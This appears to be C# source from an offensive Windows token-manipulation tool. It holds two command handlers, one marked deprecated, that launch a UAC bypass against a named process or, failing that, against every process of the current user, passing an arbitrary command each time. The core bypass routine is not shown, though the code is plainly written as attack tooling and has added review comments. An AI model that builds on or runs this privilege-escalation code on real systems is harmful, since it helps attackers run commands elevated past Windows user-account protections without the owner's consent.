        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Entry point for the UAC-bypass command: hands a target process and a command
        /// line to <c>RestrictedToken.BypassUAC</c>.
        /// </summary>
        /// <remarks>
        /// Two paths exist. When <c>GetProcessID</c> succeeds, a single attempt is made
        /// against the process ID and command it returned. Otherwise the routine falls
        /// back to every process returned by <c>Enumeration.EnumerateUserProcesses</c>
        /// for the current Windows identity and makes one attempt per process, so a
        /// single invocation can touch many processes in quick succession.
        /// NOTE(review): what <c>RestrictedToken.BypassUAC</c> does per PID is not
        /// visible in this listing.
        /// </remarks>
        /// <param name="input">
        /// Raw command argument. It is parsed by <c>GetProcessID</c>; when parsing fails
        /// it is passed through unchanged as the command for each attempt.
        /// </param>
        public static void BypassUAC(String input)
        {
            Int32  targetPid;
            String targetCommand;

            // Explicit-target path: the caller's input resolved to one process.
            if (GetProcessID(input, out targetPid, out targetCommand))
            {
                using (RestrictedToken restricted = new RestrictedToken())
                {
                    restricted.BypassUAC(targetPid, targetCommand);
                }
                return;
            }

            // Fallback path: enumerate processes for the identity running this tool.
            // NOTE(review): the meaning of the leading `true` flag is defined in
            // Enumeration.EnumerateUserProcesses, outside this listing.
            String currentUser = WindowsIdentity.GetCurrent().Name;
            Dictionary<UInt32, String> candidates = Enumeration.EnumerateUserProcesses(true, currentUser);

            foreach (KeyValuePair<UInt32, String> candidate in candidates)
            {
                Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", candidate.Key, candidate.Value);

                // A fresh RestrictedToken per attempt, disposed before the next one.
                using (RestrictedToken restricted = new RestrictedToken())
                {
                    // The enumeration yields unsigned PIDs; BypassUAC is called with a signed one.
                    restricted.BypassUAC((Int32)candidate.Key, input);
                }
            }
        }
 ////////////////////////////////////////////////////////////////////////////////
 // UAC Token Magic - Deprecated
 ////////////////////////////////////////////////////////////////////////////////
 /// <summary>
 /// Deprecated UAC-bypass command handler: forwards a process ID and command to
 /// <c>RestrictedToken.BypassUAC</c> using the supplied token handle.
 /// </summary>
 /// <remarks>
 /// The routine first prints a notice that the technique no longer works on
 /// Windows 10 versions after 1703. When <c>cLP.Remote</c> is set, one attempt is
 /// made against <c>cLP.ProcessID</c>. Otherwise one attempt is made per process
 /// returned by <c>UserSessions.EnumerateUserProcesses</c> for the current Windows
 /// identity, so a single invocation can touch many processes in quick succession.
 /// NOTE(review): what <c>RestrictedToken.BypassUAC</c> does per PID is not visible
 /// in this listing.
 /// </remarks>
 /// <param name="cLP">Parsed command line; <c>Remote</c>, <c>ProcessID</c> and <c>Command</c> are read.</param>
 /// <param name="hToken">Token handle passed to each <c>RestrictedToken</c> instance.</param>
 private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
 {
     Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");

     // Explicit-target path: the command line named a specific process.
     if (cLP.Remote)
     {
         using (RestrictedToken restricted = new RestrictedToken(hToken))
         {
             restricted.BypassUAC(cLP.ProcessID, cLP.Command);
         }
         return;
     }

     // Fallback path: enumerate processes for the identity running this tool.
     // NOTE(review): the meaning of the leading `true` flag is defined in
     // UserSessions.EnumerateUserProcesses, outside this listing.
     string currentUser = WindowsIdentity.GetCurrent().Name;
     Dictionary<uint, string> candidates = UserSessions.EnumerateUserProcesses(true, currentUser);

     foreach (KeyValuePair<uint, string> candidate in candidates)
     {
         Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", candidate.Key, candidate.Value);

         // A fresh RestrictedToken per attempt, disposed before the next one.
         using (RestrictedToken restricted = new RestrictedToken(hToken))
         {
             // The enumeration yields unsigned PIDs; BypassUAC is called with a signed one.
             restricted.BypassUAC((int)candidate.Key, cLP.Command);
         }
     }
 }